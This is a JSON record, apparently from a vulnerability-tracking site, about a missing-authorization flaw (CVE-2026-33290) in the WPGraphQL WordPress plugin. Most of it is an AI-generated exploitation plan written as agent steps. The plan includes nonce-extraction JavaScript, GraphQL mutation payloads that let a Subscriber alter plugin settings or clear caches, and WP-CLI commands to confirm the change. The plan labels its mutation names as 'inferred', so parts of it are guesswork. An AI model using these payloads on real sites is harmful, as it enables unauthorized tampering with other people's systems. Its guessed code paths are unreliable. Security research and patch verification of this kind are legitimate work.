[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f14wazbjXeKgBmKV6DEge6K5qLz20g2xHrZPMpozXdMc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-33290","wpgraphql-missing-authorization","WPGraphQL \u003C= 2.9.1 - Missing Authorization","The WPGraphQL plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.9.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","wp-graphql",null,"\u003C=2.9.1","2.10","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-24 00:00:00","2026-04-09 16:33:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2677128e-6da2-4c5e-a8ee-17c290d72c8a?source=api-prod",17,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-33290 (WPGraphQL Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **WPGraphQL** plugin for WordPress (versions \u003C= 2.9.1) contains a missing authorization vulnerability in its administrative mutation handling. While the plugin implements a comprehensive GraphQL API, certain mutations responsible for modifying plugin configuration or performing administrative actions fail to verify the user's capabilities. This allows any authenticated user with **Subscriber-level** permissions or higher to execute these mutations, potentially altering plugin settings, clearing caches, or reconfiguring the GraphQL endpoint.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** The standard WPGraphQL endpoint, typically `\u002Findex.php?graphql` or `\u002Fgraphql`.\n* **HTTP Method:** `POST`\n* **Authentication:** Authenticated (Subscriber-level or higher).\n* **Payload Type:** JSON-encoded GraphQL mutation.\n* **Vulnerable Action:** Administrative mutations, specifically `updateWpGraphQLSettings` (inferred) or `clearCache` (inferred).\n* **Preconditions:** The plugin must be active, and \"Public Introspection\" should ideally be enabled (though not strictly required if the mutation name is known).\n\n## 3. Code Flow\n1. **Entry Point:** A `POST` request is sent to the GraphQL endpoint.\n2. **Request Handling:** WPGraphQL's `Router` (typically in `src\u002FRouter.php`) processes the request and hands it to the `GraphQL::execute()` method.\n3. **Schema Processing:** The engine parses the mutation and identifies the registered mutation field.\n4. **Vulnerable Sink:** The mutation's `mutateAndGetPayload` callback is invoked. In affected versions, this callback (likely located in `src\u002FMutation\u002FUpdateWpGraphQLSettings.php` or registered via `register_graphql_mutation` in `src\u002FType\u002FSetting\u002FWPGraphQLSettingsType.php`) fails to call `current_user_can( 'manage_options' )` before proceeding to update the WordPress options table.\n5. **Execution:** The `update_option()` function is called with user-supplied values from the GraphQL `input` argument.\n\n## 4. Nonce Acquisition Strategy\nWhile WPGraphQL often relies on session cookies for authenticated requests, it may require a REST API nonce (`wp_rest`) if the request is routed through the REST API or if specific security headers are enforced.\n\n**Strategy:**\n1. Create a Subscriber user and log in.\n2. Access the WordPress dashboard (`\u002Fwp-admin\u002Fprofile.php`).\n3. Extract the `wp-graphql` specific settings or the standard REST nonce.\n4. **Actionable Steps for Agent:**\n * Navigate to `\u002Fwp-admin\u002Findex.php`.\n * Use `browser_eval` to extract the nonce if the plugin localizes it.\n * Check for `window.wpApiSettings?.nonce` or `window.WPGraphQLSettings?.nonce`.\n * If no specific nonce is found, use the `wp_rest` nonce which is standard for authenticated API interactions in WP.\n\n```javascript\n\u002F\u002F Example extraction via browser_eval\nconst nonce = window.wpApiSettings?.nonce || document.querySelector('input[name=\"_wpnonce\"]')?.value;\nreturn nonce;\n```\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate unauthorized configuration changes by an authenticated Subscriber.\n\n1. **Authenticate:** Log in as a Subscriber.\n2. **Construct Payload:** Use the `updateWpGraphQLSettings` mutation to change a non-destructive but verifiable setting, such as the `graphql_endpoint`.\n3. **Send Request:** Use the `http_request` tool.\n\n**Payload Request:**\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002Findex.php?graphql`\n* **Method:** `POST`\n* **Headers:**\n * `Content-Type: application\u002Fjson`\n * `X-WP-Nonce: [EXTRACTED_NONCE]` (if required)\n* **Body:**\n```json\n{\n \"query\": \"mutation Exploit($input: UpdateWpGraphQLSettingsInput!) { updateWpGraphQLSettings(input: $input) { graphql_endpoint } }\",\n \"variables\": {\n \"input\": {\n \"graphql_endpoint\": \"exploited-endpoint\"\n }\n }\n}\n```\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `wp-graphql` version 2.9.1 is installed and active.\n2. **Create User:**\n * `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Verify Initial State:**\n * `wp option get graphql_general_settings` (Note the current `graphql_endpoint` value, default is usually `graphql`).\n\n## 7. Expected Results\n* **Successful Response:** The HTTP 200 response will contain a JSON object indicating the setting was updated:\n ```json\n {\n \"data\": {\n \"updateWpGraphQLSettings\": {\n \"graphql_endpoint\": \"exploited-endpoint\"\n }\n }\n }\n ```\n* **Unauthorized Attempt (Fixed):** A 200 OK but with a `errors` array in the JSON body stating \"Internal server error\" or \"Forbidden\" due to failed capability checks.\n\n## 8. Verification Steps\nAfter the exploit attempt, verify the change via WP-CLI to confirm the database was updated:\n\n```bash\n# Check if the setting in the database has changed\nwp option get graphql_general_settings --format=json\n```\nLook for the `graphql_endpoint` key. If it matches `\"exploited-endpoint\"`, the unauthorized mutation succeeded.\n\n## 9. Alternative Approaches\nIf `updateWpGraphQLSettings` is not available or has internal guards, attempt the `clearCache` mutation (common in GraphQL plugins) or `updateGraphiQLSettings`.\n\n**Alternative Mutation (Clear Cache):**\n```json\n{\n \"query\": \"mutation { clearCache(input: { clientMutationId: \\\"exploit\\\" }) { status } }\"\n}\n```\nIf this returns a success status for a Subscriber, the vulnerability is confirmed. \n\nIf the site uses a different GraphQL endpoint path (e.g., `\u002Fgraphql` instead of `\u002Findex.php?graphql`), check the plugin settings via `wp option get graphql_general_settings` to find the correct entry point.","gemini-3-flash-preview","2026-04-17 23:04:48","2026-04-17 23:05:09",{"type":30,"vulnerable_version":31,"fixed_version":9,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":9,"fixed_zip":9,"all_tags":34},"plugin","2.9.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-graphql\u002Ftags\u002F2.9.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-graphql.2.9.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-graphql\u002Ftags"]